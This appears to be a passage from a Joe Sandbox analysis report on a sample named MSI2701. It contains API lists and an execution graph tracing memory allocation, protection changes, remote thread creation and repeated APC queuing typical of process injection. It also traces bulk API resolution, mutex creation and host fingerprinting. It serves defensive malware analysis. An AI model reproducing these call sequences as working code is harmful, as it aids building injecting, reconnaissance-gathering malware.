                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 004C1E01
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 004C1E21
                                                                                                                                                            • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 004C1EA7
                                                                                                                                                            • LocalFree.KERNEL32(00000001,C7C71CC4,00000000,00000000,00503C40,000000FF,?,00000000), ref: 004C1F2D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Local$AllocFree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2012307162-0
                                                                                                                                                            • Opcode ID: 13e79eda2f1b1943c97dba1df7af395d4b32d64bea2913f963930dc364050b3d
                                                                                                                                                            • Instruction ID: 525641ccb3129ba4a3a4e4e2d908c8d5c2418f17213d01667a38bfde0e8c62d6
                                                                                                                                                            • Opcode Fuzzy Hash: 13e79eda2f1b1943c97dba1df7af395d4b32d64bea2913f963930dc364050b3d
                                                                                                                                                            • Instruction Fuzzy Hash: E451D0765042159FC715DF28D880E6BB7E9FB8A360F100A2FF816D73A1DB74E9048B95

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:4.2%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:93.7%
                                                                                                                                                            Signature Coverage:12.8%
                                                                                                                                                            Total number of Nodes:650
                                                                                                                                                            Total number of Limit Nodes:49
                                                                                                                                                            execution_graph 25637 1800eed50 25642 1800eed61 _Getctype 25637->25642 25638 1800eedb2 25645 1800dbe9c 11 API calls memcpy_s 25638->25645 25639 1800eed96 HeapAlloc 25641 1800eedb0 25639->25641 25639->25642 25642->25638 25642->25639 25644 1800ed83c EnterCriticalSection LeaveCriticalSection std::_Facet_Register 25642->25644 25644->25642 25645->25641 25646 1a9942c3f40 25648 1a9942c3f69 25646->25648 25647 1a9942c3fc9 25648->25647 25649 1a9942c3fc7 NtAllocateVirtualMemory 25648->25649 25649->25647 25650 1a9942c4be0 25651 1a9942c4c02 25650->25651 25652 1a9942c4c5e 25651->25652 25653 1a9942c4c5c NtProtectVirtualMemory 25651->25653 25653->25652 25654 1a9942a55c0 25659 1a9942a5609 25654->25659 25657 1a9942a5eed 25659->25657 25692 1a9942c4360 25659->25692 25660 1a9942a57d1 25660->25657 25700 1a9942af3a0 25660->25700 25665 1a9942c4ff0 NtQueueApcThread 25666 1a9942a5eb0 25665->25666 25666->25657 25667 1a9942a5ec5 25666->25667 25669 1a9942c4ff0 NtQueueApcThread 25666->25669 25667->25657 25668 1a9942c4ff0 NtQueueApcThread 25667->25668 25670 1a9942a5ee9 25668->25670 25671 1a9942a5f0e 25669->25671 25670->25657 25673 1a9942c4ff0 NtQueueApcThread 25670->25673 25671->25657 25672 1a9942c4ff0 NtQueueApcThread 25671->25672 25672->25667 25674 1a9942a5f67 25673->25674 25674->25657 25675 1a9942c4ff0 NtQueueApcThread 25674->25675 25676 1a9942a5f93 25675->25676 25676->25657 25677 1a9942c4ff0 NtQueueApcThread 25676->25677 25678 1a9942a5fbf 25677->25678 25678->25657 25679 1a9942a5fd4 25678->25679 25681 1a9942c4ff0 NtQueueApcThread 25678->25681 25679->25657 25680 1a9942c4ff0 NtQueueApcThread 25679->25680 25682 1a9942a5ff8 25680->25682 25681->25679 25682->25657 25683 1a9942a6033 25682->25683 25684 1a9942c4ff0 NtQueueApcThread 25682->25684 25683->25657 25685 1a9942c4ff0 NtQueueApcThread 25683->25685 25684->25683 25686 1a9942a6057 25685->25686 25686->25657 25687 1a9942c4ff0 NtQueueApcThread 25686->25687 25688 1a9942a60a9 25687->25688 25688->25657 25689 1a9942c4ff0 NtQueueApcThread 25688->25689 25690 1a9942a60d5 25689->25690 25690->25657 25715 1a9942c3a40 NtProtectVirtualMemory 25690->25715 25694 1a9942c43bd 25692->25694 25693 1a9942a5795 25693->25657 25696 1a9942c45f0 25693->25696 25694->25693 25695 1a9942c444e NtCreateThreadEx 25694->25695 25695->25693 25698 1a9942c4621 25696->25698 25697 1a9942c4686 25697->25660 25698->25697 25699 1a9942c4684 NtDuplicateObject 25698->25699 25699->25697 25701 1a9942af3bd 25700->25701 25702 1a9942af3f2 CreateToolhelp32Snapshot 25701->25702 25703 1a9942af418 Thread32First 25702->25703 25704 1a9942af588 25702->25704 25703->25704 25710 1a9942af439 25703->25710 25716 1a9942bb4e0 25704->25716 25706 1a9942af5fc Thread32Next 25706->25704 25706->25710 25707 1a9942af61c 25708 1a9942a5871 25707->25708 25709 1a9942bb4e0 RtlFreeHeap 25707->25709 25708->25657 25711 1a9942c4ff0 25708->25711 25709->25708 25710->25704 25710->25706 25713 1a9942c5011 25711->25713 25712 1a9942a5e84 25712->25657 25712->25665 25713->25712 25714 1a9942c506a NtQueueApcThread 25713->25714 25714->25712 25715->25657 25717 1a9942bb523 25716->25717 25718 1a9942bb4f0 25716->25718 25717->25707 25718->25717 25719 1a9942bb511 RtlFreeHeap 25718->25719 25719->25717 25720 18001f820 25721 18001f84e 25720->25721 25725 18001f860 25720->25725 25721->25725 25731 18001f790 25721->25731 25723 18001f881 LoadLibraryExW 25726 18001f8a0 25723->25726 25724 18001f86f 25725->25723 25725->25724 25727 18001f8d7 25726->25727 25728 18001f8b6 GetLastError 25726->25728 25729 18001f8be DeactivateActCtx 25726->25729 25728->25729 25729->25727 25730 18001f8cf SetLastError 25729->25730 25730->25727 25732 18001f7a3 OutputDebugStringA 25731->25732 25733 18001f7b6 25731->25733 25732->25733 25734 18001f7cc ActivateActCtx 25733->25734 25738 18001f7ee 25733->25738 25739 18001f5c0 25733->25739 25736 18001f7e0 GetLastError 25734->25736 25734->25738 25736->25738 25738->25725 25740 18001f76a 25739->25740 25741 18001f5ee 25739->25741 25757 1800d5000 8 API calls 2 library calls 25740->25757 25741->25740 25742 18001f5fc QueryActCtxW 25741->25742 25742->25740 25744 18001f637 25742->25744 25746 18001f645 GetModuleHandleExW 25744->25746 25747 18001f709 ActivateActCtx 25744->25747 25745 18001f781 25745->25734 25745->25736 25746->25740 25749 18001f664 GetModuleFileNameW 25746->25749 25747->25740 25748 18001f722 FindActCtxSectionStringW 25747->25748 25750 18001f75d DeactivateActCtx 25748->25750 25751 18001f74f LoadLibraryExW 25748->25751 25749->25740 25752 18001f685 25749->25752 25750->25740 25751->25750 25753 18001f69c CreateActCtxW 25752->25753 25754 18001f68c SetLastError 25752->25754 25753->25747 25755 18001f6e8 GetLastError 25753->25755 25754->25740 25756 18001f6f9 25755->25756 25756->25740 25756->25747 25757->25745 25758 1a994297bf0 25759 1a994297c06 25758->25759 25775 1a994292930 25759->25775 25761 1a994297c24 25914 1a994298ed0 25761->25914 25763 1a994297d64 25947 1a994297f70 25763->25947 25765 1a994297d8c 26088 1a9942b4d00 GetUserNameW GetComputerNameExW 25765->26088 25767 1a994297f54 25768 1a994297da4 25768->25767 26120 1a9942c4740 25768->26120 25771 1a9942a4700 RtlFreeHeap 25774 1a994297e3b 25771->25774 25773 1a9942a8c60 CreateFiber 25773->25774 25774->25767 25774->25771 25774->25773 26124 1a9942a3d90 9 API calls 25774->26124 26125 1a994298bc0 25774->26125 26174 1a99429ffe0 25775->26174 25781 1a994292943 25782 1a99429f5f5 25781->25782 26246 1a99429cce0 25781->26246 25782->25761 25785 1a99429cce0 LdrGetProcedureAddress 25786 1a99429ee2b 25785->25786 25787 1a99429cce0 LdrGetProcedureAddress 25786->25787 25788 1a99429ee54 25787->25788 25789 1a99429cce0 LdrGetProcedureAddress 25788->25789 25790 1a99429ee73 25789->25790 25791 1a99429cce0 LdrGetProcedureAddress 25790->25791 25792 1a99429ee92 25791->25792 25793 1a99429cce0 LdrGetProcedureAddress 25792->25793 25794 1a99429eeb1 25793->25794 25795 1a99429cce0 LdrGetProcedureAddress 25794->25795 25796 1a99429eed0 25795->25796 25797 1a99429cce0 LdrGetProcedureAddress 25796->25797 25798 1a99429eeef 25797->25798 25799 1a99429cce0 LdrGetProcedureAddress 25798->25799 25800 1a99429ef0e 25799->25800 25801 1a99429cce0 LdrGetProcedureAddress 25800->25801 25802 1a99429ef2d 25801->25802 25803 1a99429cce0 LdrGetProcedureAddress 25802->25803 25804 1a99429ef4c 25803->25804 25805 1a99429cce0 LdrGetProcedureAddress 25804->25805 25806 1a99429ef6b 25805->25806 25807 1a99429cce0 LdrGetProcedureAddress 25806->25807 25808 1a99429ef8a 25807->25808 25809 1a99429cce0 LdrGetProcedureAddress 25808->25809 25810 1a99429efa9 25809->25810 25811 1a99429cce0 LdrGetProcedureAddress 25810->25811 25812 1a99429efc8 25811->25812 25813 1a99429cce0 LdrGetProcedureAddress 25812->25813 25814 1a99429efe7 25813->25814 25815 1a99429cce0 LdrGetProcedureAddress 25814->25815 25816 1a99429f006 25815->25816 25817 1a99429cce0 LdrGetProcedureAddress 25816->25817 25818 1a99429f025 25817->25818 25819 1a99429cce0 LdrGetProcedureAddress 25818->25819 25820 1a99429f044 25819->25820 25821 1a99429cce0 LdrGetProcedureAddress 25820->25821 25822 1a99429f063 25821->25822 25823 1a99429cce0 LdrGetProcedureAddress 25822->25823 25824 1a99429f082 25823->25824 25825 1a99429cce0 LdrGetProcedureAddress 25824->25825 25826 1a99429f0a1 25825->25826 25827 1a99429cce0 LdrGetProcedureAddress 25826->25827 25828 1a99429f0c0 25827->25828 25829 1a99429cce0 LdrGetProcedureAddress 25828->25829 25830 1a99429f0df 25829->25830 25831 1a99429cce0 LdrGetProcedureAddress 25830->25831 25832 1a99429f0fe 25831->25832 25833 1a99429cce0 LdrGetProcedureAddress 25832->25833 25834 1a99429f11d 25833->25834 25835 1a99429cce0 LdrGetProcedureAddress 25834->25835 25836 1a99429f13c 25835->25836 25837 1a99429cce0 LdrGetProcedureAddress 25836->25837 25838 1a99429f15b 25837->25838 25839 1a99429cce0 LdrGetProcedureAddress 25838->25839 25840 1a99429f17a 25839->25840 25841 1a99429cce0 LdrGetProcedureAddress 25840->25841 25842 1a99429f199 25841->25842 25843 1a99429cce0 LdrGetProcedureAddress 25842->25843 25844 1a99429f1b8 25843->25844 25845 1a99429cce0 LdrGetProcedureAddress 25844->25845 25846 1a99429f1d7 25845->25846 25847 1a99429cce0 LdrGetProcedureAddress 25846->25847 25848 1a99429f1f6 25847->25848 25849 1a99429cce0 LdrGetProcedureAddress 25848->25849 25850 1a99429f215 25849->25850 25851 1a99429cce0 LdrGetProcedureAddress 25850->25851 25852 1a99429f234 25851->25852 25853 1a99429cce0 LdrGetProcedureAddress 25852->25853 25854 1a99429f253 25853->25854 25855 1a99429cce0 LdrGetProcedureAddress 25854->25855 25856 1a99429f272 25855->25856 25857 1a99429cce0 LdrGetProcedureAddress 25856->25857 25858 1a99429f291 25857->25858 25859 1a99429cce0 LdrGetProcedureAddress 25858->25859 25860 1a99429f2b0 25859->25860 25861 1a99429cce0 LdrGetProcedureAddress 25860->25861 25862 1a99429f2cf 25861->25862 25863 1a99429cce0 LdrGetProcedureAddress 25862->25863 25864 1a99429f2ee 25863->25864 25865 1a99429cce0 LdrGetProcedureAddress 25864->25865 25866 1a99429f30d 25865->25866 25867 1a99429cce0 LdrGetProcedureAddress 25866->25867 25868 1a99429f32c 25867->25868 25869 1a99429cce0 LdrGetProcedureAddress 25868->25869 25870 1a99429f34b 25869->25870 25871 1a99429cce0 LdrGetProcedureAddress 25870->25871 25872 1a99429f36a 25871->25872 25873 1a99429cce0 LdrGetProcedureAddress 25872->25873 25874 1a99429f389 25873->25874 25875 1a99429cce0 LdrGetProcedureAddress 25874->25875 25876 1a99429f3a8 25875->25876 25877 1a99429cce0 LdrGetProcedureAddress 25876->25877 25878 1a99429f3c7 25877->25878 25879 1a99429cce0 LdrGetProcedureAddress 25878->25879 25880 1a99429f3e6 25879->25880 25881 1a99429cce0 LdrGetProcedureAddress 25880->25881 25882 1a99429f405 25881->25882 25883 1a99429cce0 LdrGetProcedureAddress 25882->25883 25884 1a99429f424 25883->25884 25885 1a99429cce0 LdrGetProcedureAddress 25884->25885 25886 1a99429f443 25885->25886 25887 1a99429cce0 LdrGetProcedureAddress 25886->25887 25888 1a99429f462 25887->25888 25889 1a99429cce0 LdrGetProcedureAddress 25888->25889 25890 1a99429f481 25889->25890 25891 1a99429cce0 LdrGetProcedureAddress 25890->25891 25892 1a99429f4a0 25891->25892 25893 1a99429cce0 LdrGetProcedureAddress 25892->25893 25894 1a99429f4bf 25893->25894 25895 1a99429cce0 LdrGetProcedureAddress 25894->25895 25896 1a99429f4de 25895->25896 25897 1a99429cce0 LdrGetProcedureAddress 25896->25897 25898 1a99429f4fd 25897->25898 25899 1a99429cce0 LdrGetProcedureAddress 25898->25899 25900 1a99429f51c 25899->25900 25901 1a99429cce0 LdrGetProcedureAddress 25900->25901 25902 1a99429f53b 25901->25902 25903 1a99429cce0 LdrGetProcedureAddress 25902->25903 25904 1a99429f55a 25903->25904 25905 1a99429cce0 LdrGetProcedureAddress 25904->25905 25906 1a99429f579 25905->25906 25907 1a99429cce0 LdrGetProcedureAddress 25906->25907 25908 1a99429f598 25907->25908 25909 1a99429cce0 LdrGetProcedureAddress 25908->25909 25910 1a99429f5b7 25909->25910 25911 1a99429cce0 LdrGetProcedureAddress 25910->25911 25912 1a99429f5d6 25911->25912 25913 1a99429cce0 LdrGetProcedureAddress 25912->25913 25913->25782 26250 1a9942b4ce0 25914->26250 25919 1a9942c3de0 RtlFreeHeap 25920 1a9942990af 25919->25920 25921 1a9942c3de0 RtlFreeHeap 25920->25921 25922 1a994299110 25921->25922 25923 1a9942c3de0 RtlFreeHeap 25922->25923 25924 1a99429916c 25923->25924 25925 1a9942c3de0 RtlFreeHeap 25924->25925 25926 1a9942991a1 25925->25926 25927 1a9942c3de0 RtlFreeHeap 25926->25927 25928 1a9942991f1 25927->25928 25929 1a9942c3de0 RtlFreeHeap 25928->25929 25930 1a994299222 25929->25930 25931 1a9942c3de0 RtlFreeHeap 25930->25931 25932 1a99429925a 25931->25932 25933 1a9942c3de0 RtlFreeHeap 25932->25933 25934 1a9942992af 25933->25934 25935 1a9942c3de0 RtlFreeHeap 25934->25935 25936 1a9942992f1 25935->25936 25937 1a9942c3de0 RtlFreeHeap 25936->25937 25938 1a994299333 25937->25938 25939 1a9942c3de0 RtlFreeHeap 25938->25939 25940 1a994299347 25939->25940 25941 1a9942c3de0 RtlFreeHeap 25940->25941 25942 1a994299362 25941->25942 25943 1a9942c3de0 RtlFreeHeap 25942->25943 25944 1a99429938e 25943->25944 25945 1a9942c3de0 RtlFreeHeap 25944->25945 25946 1a9942993c1 25945->25946 25946->25763 25948 1a994297fb8 25947->25948 25949 1a994297f99 25947->25949 25951 1a994297fda 25948->25951 25952 1a9942c3de0 RtlFreeHeap 25948->25952 25950 1a9942c3de0 RtlFreeHeap 25949->25950 25950->25948 26256 1a9942b5560 25951->26256 25952->25951 25956 1a9942b5560 RtlFreeHeap 25960 1a994298066 25956->25960 25957 1a99429802a 25957->25956 25958 1a994298088 25959 1a9942b5560 RtlFreeHeap 25958->25959 25964 1a99429809c 25959->25964 25960->25958 25961 1a9942bb4e0 RtlFreeHeap 25960->25961 25961->25958 25962 1a9942980be 25963 1a9942b5560 RtlFreeHeap 25962->25963 25968 1a9942980d2 25963->25968 25964->25962 25965 1a9942bb4e0 RtlFreeHeap 25964->25965 25965->25962 25966 1a9942980f4 25967 1a9942b5560 RtlFreeHeap 25966->25967 25972 1a994298108 25967->25972 25968->25966 25969 1a9942bb4e0 RtlFreeHeap 25968->25969 25969->25966 25970 1a99429812a 25971 1a9942b5560 RtlFreeHeap 25970->25971 25976 1a99429813e 25971->25976 25972->25970 25973 1a9942bb4e0 RtlFreeHeap 25972->25973 25973->25970 25974 1a994298160 25975 1a9942b5560 RtlFreeHeap 25974->25975 25980 1a994298174 25975->25980 25976->25974 25978 1a9942bb4e0 RtlFreeHeap 25976->25978 25977 1a994298197 25979 1a9942b5560 RtlFreeHeap 25977->25979 25978->25974 25984 1a9942981ab 25979->25984 25980->25977 25981 1a9942bb4e0 RtlFreeHeap 25980->25981 25981->25977 25982 1a9942981d4 25983 1a9942b5560 RtlFreeHeap 25982->25983 25985 1a9942981e8 25983->25985 25984->25982 25987 1a9942bb4e0 RtlFreeHeap 25984->25987 25986 1a99429823d 25985->25986 25988 1a9942abe20 RtlFreeHeap 25985->25988 25989 1a9942b5560 RtlFreeHeap 25986->25989 25987->25982 25990 1a994298214 25988->25990 26011 1a994298251 25989->26011 25993 1a9942bb4e0 RtlFreeHeap 25990->25993 25991 1a99429838a 25992 1a9942b5560 RtlFreeHeap 25991->25992 25994 1a99429839e 25992->25994 25995 1a994298235 25993->25995 25996 1a9942b5560 RtlFreeHeap 25994->25996 25997 1a9942bb4e0 RtlFreeHeap 25995->25997 26000 1a9942983ba 25996->26000 25997->25986 25998 1a994298b86 25998->25765 25999 1a994298430 26001 1a9942b5560 RtlFreeHeap 25999->26001 26000->25998 26000->25999 26016 1a9942bb4e0 RtlFreeHeap 26000->26016 26002 1a994298444 26001->26002 26005 1a99429846d 26002->26005 26008 1a9942abe20 RtlFreeHeap 26002->26008 26003 1a994298322 26004 1a99429835d 26003->26004 26014 1a99429a050 RtlFreeHeap 26003->26014 26007 1a9942bb4e0 RtlFreeHeap 26004->26007 26010 1a9942b5560 RtlFreeHeap 26005->26010 26012 1a99429837d 26007->26012 26009 1a994298460 26008->26009 26013 1a9942bb4e0 RtlFreeHeap 26009->26013 26015 1a99429848e 26010->26015 26011->25991 26011->26003 26264 1a99429a050 26011->26264 26017 1a9942bb4e0 RtlFreeHeap 26012->26017 26013->26005 26014->26004 26018 1a9942984b7 26015->26018 26020 1a9942abe20 RtlFreeHeap 26015->26020 26019 1a994298423 26016->26019 26017->25991 26023 1a9942b5560 RtlFreeHeap 26018->26023 26021 1a9942bb4e0 RtlFreeHeap 26019->26021 26022 1a9942984aa 26020->26022 26021->25999 26024 1a9942bb4e0 RtlFreeHeap 26022->26024 26025 1a9942984d8 26023->26025 26024->26018 26026 1a994298501 26025->26026 26027 1a9942abe20 RtlFreeHeap 26025->26027 26029 1a9942b5560 RtlFreeHeap 26026->26029 26028 1a9942984f4 26027->26028 26030 1a9942bb4e0 RtlFreeHeap 26028->26030 26031 1a994298522 26029->26031 26030->26026 26032 1a99429854b 26031->26032 26033 1a9942abe20 RtlFreeHeap 26031->26033 26034 1a9942b5560 RtlFreeHeap 26032->26034 26035 1a99429853e 26033->26035 26036 1a99429856c 26034->26036 26037 1a9942bb4e0 RtlFreeHeap 26035->26037 26038 1a994298595 26036->26038 26039 1a9942abe20 RtlFreeHeap 26036->26039 26037->26032 26041 1a9942b5560 RtlFreeHeap 26038->26041 26040 1a994298588 26039->26040 26042 1a9942bb4e0 RtlFreeHeap 26040->26042 26043 1a9942985b6 26041->26043 26042->26038 26044 1a9942b5560 RtlFreeHeap 26043->26044 26045 1a9942985d2 26044->26045 26045->25998 26046 1a9942bb4e0 RtlFreeHeap 26045->26046 26047 1a994298625 26046->26047 26048 1a9942bb4e0 RtlFreeHeap 26047->26048 26049 1a99429865e 26048->26049 26050 1a9942b5560 RtlFreeHeap 26049->26050 26051 1a994298672 26050->26051 26051->25998 26052 1a9942bb4e0 RtlFreeHeap 26051->26052 26053 1a994298797 26052->26053 26054 1a9942bb4e0 RtlFreeHeap 26053->26054 26055 1a9942987a4 26054->26055 26056 1a9942b5560 RtlFreeHeap 26055->26056 26057 1a9942987b8 26056->26057 26057->25998 26058 1a9942bb4e0 RtlFreeHeap 26057->26058 26059 1a9942987ec 26058->26059 26060 1a9942b5560 RtlFreeHeap 26059->26060 26061 1a994298800 26060->26061 26061->25998 26062 1a9942bb4e0 RtlFreeHeap 26061->26062 26063 1a99429882d 26062->26063 26064 1a9942b5560 RtlFreeHeap 26063->26064 26065 1a994298841 26064->26065 26066 1a9942b5560 RtlFreeHeap 26065->26066 26067 1a99429885d 26066->26067 26067->25998 26068 1a9942bb4e0 RtlFreeHeap 26067->26068 26069 1a994298897 26068->26069 26070 1a9942b5560 RtlFreeHeap 26069->26070 26073 1a9942988ab 26070->26073 26071 1a9942bb4e0 RtlFreeHeap 26072 1a9942989c8 26071->26072 26074 1a9942bb4e0 RtlFreeHeap 26072->26074 26073->25998 26073->26071 26075 1a9942989d5 26074->26075 26076 1a9942b5560 RtlFreeHeap 26075->26076 26085 1a9942989eb 26076->26085 26077 1a994298aec 26082 1a9942abe20 RtlFreeHeap 26077->26082 26087 1a994298b47 26077->26087 26078 1a9942bb4e0 RtlFreeHeap 26080 1a994298b79 26078->26080 26079 1a9942abe20 RtlFreeHeap 26079->26085 26081 1a9942bb4e0 RtlFreeHeap 26080->26081 26081->25998 26083 1a994298b2a 26082->26083 26086 1a9942bb4e0 RtlFreeHeap 26083->26086 26084 1a9942bb4e0 RtlFreeHeap 26084->26085 26085->25998 26085->26077 26085->26079 26085->26084 26086->26087 26087->26078 26089 1a9942b4db1 26088->26089 26090 1a9942b4dc7 GetComputerNameExW 26088->26090 26089->26090 26091 1a9942b4def 26090->26091 26092 1a9942b4df3 GetTokenInformation 26091->26092 26097 1a9942b4e4e 26091->26097 26093 1a9942b4e1c 26092->26093 26092->26097 26094 1a9942b4e3e 26093->26094 26095 1a9942c3de0 RtlFreeHeap 26093->26095 26096 1a9942c3de0 RtlFreeHeap 26094->26096 26095->26094 26096->26097 26268 1a9942adfc0 26097->26268 26100 1a9942b4eaa GetNativeSystemInfo 26102 1a9942b4ed3 26100->26102 26103 1a9942b4ee8 26100->26103 26101 1a9942c3de0 RtlFreeHeap 26101->26100 26105 1a9942c3de0 RtlFreeHeap 26102->26105 26103->26102 26104 1a9942b4f17 26103->26104 26106 1a9942c3de0 RtlFreeHeap 26104->26106 26107 1a9942b4f15 26105->26107 26106->26107 26109 1a9942c3de0 RtlFreeHeap 26107->26109 26112 1a9942b4f67 26107->26112 26108 1a9942b4f8f GetAdaptersInfo 26110 1a9942b4fbb 26108->26110 26111 1a9942b4fdd 26108->26111 26109->26112 26113 1a9942bb4e0 RtlFreeHeap 26110->26113 26111->26110 26115 1a9942b4fea GetAdaptersInfo 26111->26115 26112->26108 26114 1a9942b4fc5 26113->26114 26116 1a9942bb4e0 RtlFreeHeap 26114->26116 26115->26110 26119 1a9942b4fff 26115->26119 26117 1a9942b4fcd 26116->26117 26117->25768 26118 1a9942c3de0 RtlFreeHeap 26118->26119 26119->26110 26119->26118 26121 1a9942c4759 26120->26121 26122 1a9942c47af 26121->26122 26123 1a9942c47ad NtFreeVirtualMemory 26121->26123 26122->25774 26123->26122 26124->25774 26126 1a994298bde 26125->26126 26127 1a99429a050 RtlFreeHeap 26126->26127 26128 1a994298c5e 26127->26128 26129 1a99429a050 RtlFreeHeap 26128->26129 26130 1a994298c97 26129->26130 26131 1a9942bb4e0 RtlFreeHeap 26130->26131 26132 1a994298cee 26131->26132 26133 1a994298d5c 26132->26133 26134 1a994298d44 26132->26134 26135 1a994298d5e 26132->26135 26136 1a99429a050 RtlFreeHeap 26133->26136 26138 1a994298d8b 26133->26138 26134->26133 26139 1a99429a050 RtlFreeHeap 26134->26139 26137 1a99429a050 RtlFreeHeap 26135->26137 26136->26138 26137->26133 26140 1a9942bb4e0 RtlFreeHeap 26138->26140 26139->26133 26141 1a994298d93 26140->26141 26142 1a9942bb4e0 RtlFreeHeap 26141->26142 26143 1a994298d9b 26142->26143 26144 1a994298de9 26143->26144 26145 1a994298df0 26143->26145 26307 1a9942a6fa0 LdrGetProcedureAddress RtlFreeHeap 26144->26307 26272 1a994297830 26145->26272 26148 1a994298dee 26149 1a994298e8e 26148->26149 26150 1a9942abe20 RtlFreeHeap 26148->26150 26296 1a9942917b0 26149->26296 26152 1a994298e23 26150->26152 26154 1a994298e2a 26152->26154 26160 1a994298e34 26152->26160 26153 1a9942bb4e0 RtlFreeHeap 26155 1a994298ea4 26153->26155 26156 1a9942bb4e0 RtlFreeHeap 26154->26156 26157 1a9942bb4e0 RtlFreeHeap 26155->26157 26158 1a994298e32 26156->26158 26159 1a994298eac 26157->26159 26158->26153 26161 1a9942bb4e0 RtlFreeHeap 26159->26161 26162 1a9942bb4e0 RtlFreeHeap 26160->26162 26163 1a994298eb4 26161->26163 26164 1a994298e5f 26162->26164 26165 1a9942bb4e0 RtlFreeHeap 26163->26165 26166 1a99429a050 RtlFreeHeap 26164->26166 26167 1a994298ebc 26165->26167 26168 1a994298e71 26166->26168 26167->25774 26169 1a9942bb4e0 RtlFreeHeap 26168->26169 26170 1a994298e79 26169->26170 26308 1a9942b51d0 RtlFreeHeap 26170->26308 26172 1a994298e86 26173 1a9942bb4e0 RtlFreeHeap 26172->26173 26173->26149 26176 1a99429fff9 26174->26176 26175 1a994292939 26194 1a99429f8a0 26175->26194 26176->26175 26177 1a99429cce0 LdrGetProcedureAddress 26176->26177 26178 1a9942a0072 26177->26178 26179 1a99429cce0 LdrGetProcedureAddress 26178->26179 26180 1a9942a008d 26179->26180 26181 1a99429cce0 LdrGetProcedureAddress 26180->26181 26182 1a9942a00b6 26181->26182 26183 1a99429cce0 LdrGetProcedureAddress 26182->26183 26184 1a9942a00d5 26183->26184 26185 1a99429cce0 LdrGetProcedureAddress 26184->26185 26186 1a9942a00f4 26185->26186 26187 1a99429cce0 LdrGetProcedureAddress 26186->26187 26188 1a9942a0113 26187->26188 26189 1a99429cce0 LdrGetProcedureAddress 26188->26189 26190 1a9942a0132 26189->26190 26191 1a99429cce0 LdrGetProcedureAddress 26190->26191 26192 1a9942a0151 26191->26192 26193 1a99429cce0 LdrGetProcedureAddress 26192->26193 26193->26175 26195 1a99429f8da 26194->26195 26196 1a99429293e 26195->26196 26197 1a99429cce0 LdrGetProcedureAddress 26195->26197 26202 1a9942a3470 26196->26202 26198 1a99429f900 26197->26198 26199 1a99429cce0 LdrGetProcedureAddress 26198->26199 26200 1a99429f91b 26199->26200 26201 1a99429cce0 LdrGetProcedureAddress 26200->26201 26201->26196 26203 1a9942a3489 26202->26203 26204 1a9942a3493 26203->26204 26205 1a99429cce0 LdrGetProcedureAddress 26203->26205 26204->25781 26206 1a9942a3502 26205->26206 26207 1a99429cce0 LdrGetProcedureAddress 26206->26207 26208 1a9942a351d 26207->26208 26209 1a99429cce0 LdrGetProcedureAddress 26208->26209 26210 1a9942a3546 26209->26210 26211 1a99429cce0 LdrGetProcedureAddress 26210->26211 26212 1a9942a3565 26211->26212 26213 1a99429cce0 LdrGetProcedureAddress 26212->26213 26214 1a9942a3584 26213->26214 26215 1a99429cce0 LdrGetProcedureAddress 26214->26215 26216 1a9942a35a3 26215->26216 26217 1a99429cce0 LdrGetProcedureAddress 26216->26217 26218 1a9942a35c2 26217->26218 26219 1a99429cce0 LdrGetProcedureAddress 26218->26219 26220 1a9942a35e1 26219->26220 26221 1a99429cce0 LdrGetProcedureAddress 26220->26221 26222 1a9942a3600 26221->26222 26223 1a99429cce0 LdrGetProcedureAddress 26222->26223 26224 1a9942a361f 26223->26224 26225 1a99429cce0 LdrGetProcedureAddress 26224->26225 26226 1a9942a363e 26225->26226 26227 1a99429cce0 LdrGetProcedureAddress 26226->26227 26228 1a9942a365d 26227->26228 26229 1a99429cce0 LdrGetProcedureAddress 26228->26229 26230 1a9942a367c 26229->26230 26231 1a99429cce0 LdrGetProcedureAddress 26230->26231 26232 1a9942a369b 26231->26232 26233 1a99429cce0 LdrGetProcedureAddress 26232->26233 26234 1a9942a36ba 26233->26234 26235 1a99429cce0 LdrGetProcedureAddress 26234->26235 26236 1a9942a36d9 26235->26236 26237 1a99429cce0 LdrGetProcedureAddress 26236->26237 26238 1a9942a36f8 26237->26238 26239 1a99429cce0 LdrGetProcedureAddress 26238->26239 26240 1a9942a3717 26239->26240 26241 1a99429cce0 LdrGetProcedureAddress 26240->26241 26242 1a9942a3736 26241->26242 26243 1a99429cce0 LdrGetProcedureAddress 26242->26243 26244 1a9942a3755 26243->26244 26245 1a99429cce0 LdrGetProcedureAddress 26244->26245 26245->26204 26248 1a99429cd1b 26246->26248 26247 1a99429cdbf 26247->25785 26248->26247 26249 1a99429cd9b LdrGetProcedureAddress 26248->26249 26249->26247 26251 1a994298eee CreateMutexExA 26250->26251 26252 1a9942c3de0 26251->26252 26254 1a9942c3e14 26252->26254 26253 1a994298f71 26253->25919 26254->26253 26255 1a9942bb4e0 RtlFreeHeap 26254->26255 26255->26254 26257 1a9942b557b 26256->26257 26259 1a994298016 26256->26259 26258 1a9942bb4e0 RtlFreeHeap 26257->26258 26257->26259 26258->26259 26259->25957 26260 1a9942abe20 26259->26260 26261 1a9942abe5c 26260->26261 26262 1a9942abea5 26261->26262 26263 1a9942bb4e0 RtlFreeHeap 26261->26263 26262->25957 26263->26262 26266 1a99429a084 26264->26266 26265 1a99429a118 26265->26011 26266->26265 26267 1a9942bb4e0 RtlFreeHeap 26266->26267 26267->26266 26270 1a9942adff1 26268->26270 26269 